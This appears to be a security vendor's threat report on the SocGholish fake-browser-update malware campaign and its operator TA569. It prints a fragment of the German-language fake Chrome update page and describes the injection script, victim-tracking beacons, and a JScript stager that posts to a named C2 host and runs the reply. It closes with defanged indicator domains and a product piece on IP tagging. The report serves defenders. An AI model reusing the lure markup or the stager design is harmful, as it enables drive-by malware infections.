This line instructs your browser to display the specified text in the tab at the top of your screen – in this case, “Update Chrome” would appear as the tab’s name.

Additionally, it contains images such as the icon below (loaded from Base64):

Screenshot of the Google Chrome icon in question, loaded from Base64
Screenshot of the Google Chrome icon in question, loaded from Base64

This hints at what we are looking at. Among other things, the document.body.innerHTML also contains the following strings:

A German message (adapting to the geographic region of the intended victim here) tells the user they are using an outdated version of Chrome and to please click a dynamically generated button to download the update:

Sie benutzen eine alte Version von Chrome < /h1>' + ' <p class="browser-promo"><nobr>Führen Sie ein Update jetzt durch, um ihr Chrome reibungslos und sicher laufen zu lassen.</nobr > < /p>' + ' <p class="browser-promo">Ihr Download wird automatisch gestartet. Wenn nicht, dann klicken Sie hier:</p > ' + ' < a class = "button eula-download-button download-button desktop-only hide-cros"
href = "javascript:void(0)" > Update Chrome < /a>' + ' <img class="hi-dpi empty-area section-hero" src="data:image/jpg;
base64, /9j/


  1. The third step of this script is to render an update page that mimics a “Chrome Browser Update,” featuring a button to download a file.
  2. We then see functionality that attempts to aggressively remove the current page’s content, except for the dynamically rendered update page. Essentially, the outcome is a complete visual redesign of the website to render the update page without ever redirecting the user anywhere else.
    4.1 | The script clones the entire body of the current page, then replaces the old body with the new copy. This removes all active JavaScript event listeners attached to the DOM without changing the visual layout.
    4.2 | Then, it does a check every 500 ms on all body elements. If they do not have a className or the className does not contain “fatnav-header” or “browser-landing”, it removes those elements (fatnav-header and browser-landing are the classnames used in the dynamic update page).
    4.3 | The script then overwrites the Google Tag Manager autoEventsSettings. This prevents Google Tag Manager from performing automated tracking. Likely an attempt to prevent Google from logging the infection changes, thereby potentially alerting admins.
    4.4 | The script also disables the F5 button’s functionality. This button would normally cause a reload of the page, potentially destroying the fake update page.
  3. The next three functions define an interesting tracking mechanism. The script creates three flags related to tracking three different interactions of a Victim:
    var mouseMove = false;
    var buttonOver = false;
    var buttonClick = false;
    As soon as the template is rendered, if the victim moves the mouse, the first event is fired. It sends a string to the JavaScript C2.
    Then, if the victim’s mouse hovers over the download button, a second event is fired, again being tracked via loading an “image” from the C2.
    If the victim then clicks the button, a third event is fired, marking the final “image” load from the C2.
    Note: All Events fire only once.
    Note 2: What we have detailed here is a fascinating mechanism to confirm the user is alive and clicking the payload. It is likely to be part of the TDS, filtering out real users from fake ones who might be researchers. We believe that if these three image loads are not executed (in order), no payload or a low-value payload is sent to the victim after infection.
  4. The script then creates an iframe that is attached to the button of the previously rendered “browser-landing” page. It is the same button previously pointed out above.
    The flow of this code:
    6.1 | The page loads and sets up an invisible iframe.
    6.2 | User clicks the button.
    6.3 | Two things happen: btnClickStat() and btnClickAction() are triggered.
    6.4 | btnClickAction() sends a ‘download’ message to the iframe immediately and sets btnActionClicked = true.
    6.5 | If the iframe isn’t ready yet, it might respond later with a ‘loaded’ message.
    6.6 | When “loaded” is received, if the user had clicked “download,” it is sent again.

Examining this iframe, we see the .src argument is obfuscated with Base64.

In the end, if all additional checks described in this section of our analysis are passed, the victim will receive a downloadable payload when they click a button.


The On-Device SocGholish Windows Agent

The intermediate C2 framework dynamically generates payloads that victims download at runtime. These intermediate C2 servers are associated with the same SocGholish inject domain pattern we referenced previously: <subdomain>.<domain>.<tld>/randomchars.

It is essential to note that across the execution framework, from the initial SocGholish injection to the on-device execution of the Windows implant, the entire process is continuously tracked by SocGholish’s C2 framework. If, at any time, the framework determines that a given victim is not “legitimate,” it will stop the serving of a payload.

Additionally, links are likely to be bound to the IP of the victim and have a set “expiry time.” As such, all links associated with these stages are useless for third-party researchers attempting to track this threat. To receive all stages, one must either monitor a live infection or emulate the entire chain from start to finish.

The SocGholish Agent, which is downloaded to the device, can appear in multiple formats. Most of the time, it is either a .zip file containing a .js file (whereby .js stands for JScript, a Windows version of JavaScript) or the .js file itself.

The names of these payloads also vary and often include the browser name, alongside certain keywords intended to obscure their intended purpose, i.e., words like “installer” or “update.”

In the most recent iteration (as of July 2025), TA569 has changed the name of this JScript payload to “LatestVersion.js.”

SocGholish actors tend to also mix in non-standard encodings for different letters, such as a Unicode character encoding of a single character in the word “update,” which then makes detection by standard anti-virus solutions more difficult.

An example iframe for a payload targeting a user running the Firefox web browser is shown here:

Screenshot example iframe for a payload targeting a user running Firefox
Screenshot example iframe for a payload targeting a user running Firefox

This will download the .zip file contained in base64 and store it as “UpdateInstaller[.]zip”.

Inside the file, “Version[.]139[.]3195[.]25[.]js” is designed to appear like a standard Firefox update file, giving an apparent Firefox version in the filename. The deobfuscation of which can be seen below, with some variables renamed and code reformatted for legibility:

SocGholish's initial implant is a relatively simple JS stager that has only two functions
SocGholish’s initial implant is a relatively simple JavaScript stager with only two functions

Here we can see that this initial implant of SocGholish is a relatively simple JS stager that has only two functions:

First, using an ActiveXObject, it creates a POST request to a SocGholish Implant C2, sending along the tracking ID associated with the previous attack chain:

  • cpanel[.]santechplumbing[.]com/profileLayout

Second, it starts a loop, waiting briefly before checking whether the C2 returned any data. If so, then the response text is executed and the loop stops. Otherwise, it continues infinitely.

This stage contains a preventive measure. Since the payload is still being associated with the previous infection chain, if the IP suddenly changes, the C2 will not follow up with a payload.

In earlier campaigns, SocGholish was observed setting up wildcard subdomains (where any subdomain attempted would resolve); however, it appears that they have since switched to using static subdomains over the last year or so.

An important note here is that the domains being used are set up using Domain Shadowing*.

In addition to Domain Shadowing, SocGholish rotates its domains every two to three days, making indicators highly volatile and time-restricted in utility for defenders.

Additionally, the servers used as C2 servers for the implant are themselves proxies. The real C2 panel is hosted on Tor, and all requests are routed via a Tor proxy.*

*Note: Our team has not seen this detail being publicly discussed beyond an interesting graphic by Proofpoint in a 2023 blog (Figure 14: SocGholish Overview).

TA569 occasionally rotates the C2 path for the on-device JScript stager. Besides the /profileLayout path observed in the previous code example, recent C2 paths observed are “/merchantServices”, “/checkAjax”, and “/viewDashboard”. Silent Push researchers believe this to be an attempt to evade the detection of C2 traffic via known paths in monitored networks.

The Raspberry Robin Connection

Silent Push Threat Analysts have reported before on our observations of Raspberry Robin’s connections to Russia and in 2024, the Cybersecurity and Infrastructure Security Agency (CISA), the FBI, and the NSA released a joint advisory linking Raspberry Robin to actors associated with Russia’s GRU, and the 161st Specialist Training Center (Unit 29155), underscoring its role in state-sponsored cyber operations. Their advisory can be accessed here: “Russian Military Cyber Actors Target US and Global Critical Infrastructure.”

In 2022, Microsoft also highlighted that they observed the SocGholish on-device agent being pushed via the Raspberry Pi Worm, which led to ransomware activity related to Dev-0243, including pre-ransomware behavior. This likely indicates that SocGholish bought traffic from Raspberry Robin and then sold the high-value infections to DEV-0243.

Where it becomes more interesting is when we highlight the fact that Microsoft, in another post about Raspberry Robin, concludes that there is code overlap between Raspberry Robin and Dridex, with Dridex being one of the earliest malware types that made DEV-0243 a notorious actor in the Russian Cybercrime Landscape.

Not only is DEV-0243 one of the main (if not the exclusive) customers for high-value SocGholish infections, but it’s also possible that DEV-0243 is to some degree involved in spreading SocGholish directly via Raspberry Robin, as discussed by an IBM post, accessed via the Wayback Machine, titled: “Raspberry Robin and Dridex: Two Birds of a Feather.” Thus, we assess it is at least possible that there are former members of these groups involved in all three malware families.


Customers of TA569

The most well-known customer of TA569 is identified as UNC2165 ((also known as DEV-0243, as mentioned above and tracked as Manatee Tempest, SilverFish, GoldDrake, and Indrik Spider), which are all aliases likely referring to Evil Corp), one of the most notorious Russian cybercrime actors.

This group is known to use SocGholish as an initial infection vector for ransomware deployment. Following the public indictment of several members of Evil Corp in 2019, the group transitioned from using proprietary ransomware variants to Ransomware-as-a-Service (RaaS) offerings, such as Lockbit Ransomware.

The prevailing assumption is that Evil Corp made this decision due to sanctions against its core members, rendering it illegal for most organizations to pay their ransom demands. By hiding behind RaaS operations, victims of Evil Corp are more likely to pay the ransoms since they do not need to fear knowingly breaking sanctions by doing so.

This change in tactics also makes it harder to determine which ransomware attacks related to SocGholish are executed by Evil Corp members and which others (if any) are not.

MintsLoader

Another recently observed customer of TA569 is the MintsLoader malware family. Also of note is an activity cluster named UNC4108, which appears to be directly related. UNC4108 utilizes MintsLoader to deploy various payloads, including info stealers, form grabber plugins, NetSupport RAT, and a backdoored BOINC client.

The primary function of loaders such as MintsLoader is to download and execute other malicious payloads, including RATs, infostealers, and modified BOINC* clients used for unauthorized computing.

Silent Push Threat Analysts are currently investigating MintsLoader to a greater degree than the scope of this report and will release our findings once the research is complete for our customers and, if possible, to the public.


Sign Up for a Free Silent Push Community Edition Account

Register now for our free Community Edition to use all the tools and queries highlighted in this blog.


Mitigation

Silent Push believes all domains associated with SocGholish and TA569 present a significant level of risk. Proactive measures are essential to defend against this evolving threat.

Our analysts construct Silent Push Indicators Of Future Attack™ (IOFA™) Feeds, which provide a growing list of data focused on scams supported by this technique. These feeds include:

  • FakeUpdates – TA569/SocGholish Domains
  • FakeUpdates – TA2726 Domains
  • Loader – Mintsloader Domains and IP addresses
  • Keitaro C2 Domains and IP addresses
  • Bulk Data Feeds for compromised domains.

The IOFA™ Feeds are available as part of a Silent Push Enterprise subscription. Enterprise users can ingest this data into their security stack to inform their detection protocols or use it to pivot across attacker infrastructure using the Silent Push Console and Feed Analytics screen.


Sample SocGholish Indicators of Future Attack™ (IOFA™) List

Below is a sample list of Silent Push IOFA™ associated with SocGholish. Our complete list is available for enterprise users.

  • docs[.]nynovation[.]com
  • download[.]romeropizza[.]com
  • publication[.]garyjobeferguson[.]com
  • images[.]therunningink[.]com
  • trust[.]scriptobject[.]com
  • source[.]scriptsafedata[.]com
  • mgmt[.]studerandson[.]us
  • virtual[.]urban-orthodontics[.]com
  • billing[.]roofnrack[.]us
  • customer[.]thewayofmoney[.]us
  • searchgear[.]pro
  • rapiddevapi[.]com
  • cp[.]envisionfonddulac[.]biz

Continuing to Track SocGholish/TA569

Our team continues to investigate and track the SocGholish family of malware, its operator TA569, and all related actors, TDSs, and payloads involved in the complex infrastructure tied to this advanced threat.

Silent Push Enterprise customers enjoy customer-only reporting streams on this threat and many others. Where possible, we will share the details that can be made public here with our readers.

IP Tagging in Silent Push: VPN, Proxy and Sinkhole Detection

Security analysts face the constant challenge of gaining immediate and accurate context on IP addresses that pop up during an investigation, to minimize risk and prevent loss.

We’ve solved this problem by introducing an IP tagging system that categorizes every scanned IPv4 address as a residential VPN, proxy, or sinkhole, with detailed sub-categories available for each.

Tagging data is passed onto Community and Enterprise users via the Total View screen, within threat feed searches, and made available as a filterable bulk download for Enterprise users only.

What Is IP tagging in Silent Push? 

We flag IPs across our global IPv4 datasets as belonging to one of the below categories: 

  • Residential VPN – including attribution to the commercial provider 
  • Proxy services – with subcategories for residential, open, HTTP, SOCKS4/5, or requiring authentication 
  • Sinkhole – typically operated by security researchers or defenders attempting to neutralize malicious infrastructure 

How can I access IP tagging data? 

IP tagging is designed to work wherever analysts work. Users can access the data in the following locations: 

Total View 

Total View is the platform’s central interface, and a CTI landing page for gaining instant insight into unknown indicators. 

From this screen, users can view tagging information on any IPs they come across alongside: 

  • Historical DNS records 
  • Hosting details 
  • Campaign associations 
  • Silent Push proprietary enrichment data 
  • The IP’s presence in any threat feeds. 

Daily bulk download (‘IP Context’) 

Enterprise users have access to an ‘IP Context’ option, under the ‘Data Export’ menu, which acts as a central hub for bulk downloads of all tagged IPs per category, and their ‘last seen’ date. 

From here, users can export all our tag data, or drill down into individual VPN providers and proxy services (including free proxies), allowing teams to feed tags into their SIEM/SOAR workflows via the Silent Push API, based on their unique operational requirements. 

Data is available as an automated export via code snippets, or as a one-click CSV download.

API endpoint export

Feed Scanner queries

Our Feed Scanner is a syntax-based search of all the data contained in threat feeds that are visible on a user’s Silent Push account – including any third-party feeds.

For example, the ‘Is Proxy’ field can be used to identify all proxied IPs on AS209372 that appear as malicious.

Why Contextual IP Tagging Data Matters 

To evade detection, attackers rely on infrastructure that blends in with legitimate activity. VPNs and residential proxies help threat actors bypass geo-filters, rate limits, and detection logic. 

Without context, defenders waste time chasing false positives and missing subtle links between malicious assets. 

IP tagging reduces that uncertainty. It adds a functional layer to observed IPs that would otherwise appear generic or ambiguous, giving defenders a quick way to assess risk and relevance. 

Enterprise Use Cases for IP Tagging 

Credential stuffing and account takeover detection

Automated login attempts often originate from residential proxies, in order to appear as legitimate users. With IP tagging, SOC teams can flag or filter such IPs during authentication events and respond before credentials are compromised. 

Infrastructure discovery 

During investigations, unknown IPs sometimes emerge without clear ownership. Flagging suspect infrastructure helps identify whether these IPs belong to everyday users, anonymous VPNs, or proxy services – refining triage decisions and improving accuracy. 

Threat Actor clustering 

Attackers reuse infrastructure across campaigns. By identifying shared VPN or proxy use, teams can correlate threat activity and block related assets earlier in the kill chain. 

Incident Response and malware triage 

Sinkholes generate alerts that distract from active threats. Identifying sinkholes early on in an investigation helps responders recognize benign IPs, reducing noise and allowing teams to focus on containment and root cause analysis.

Advertising fraud and traffic manipulation 

Proxied IPs play a central role in ad fraud, bot traffic, and coordinated inauthentic behavior. Tagging allows security and ad tech teams to identify suspicious sources, monitor patterns and build targeted defenses against fraudulent schemes. 

Book a Demo 

Contextual IP data helps answer the essential question that every defender asks themselves: what am I looking at?

IP tagging in Silent Push is a critical enabler for teams trying to detect fraud, uncover hidden attacker infrastructure, and slash false positives in noisy environments.

Get in touch with our team today, and let us show you how much more we know about the Internet than any other cybersecurity vendor.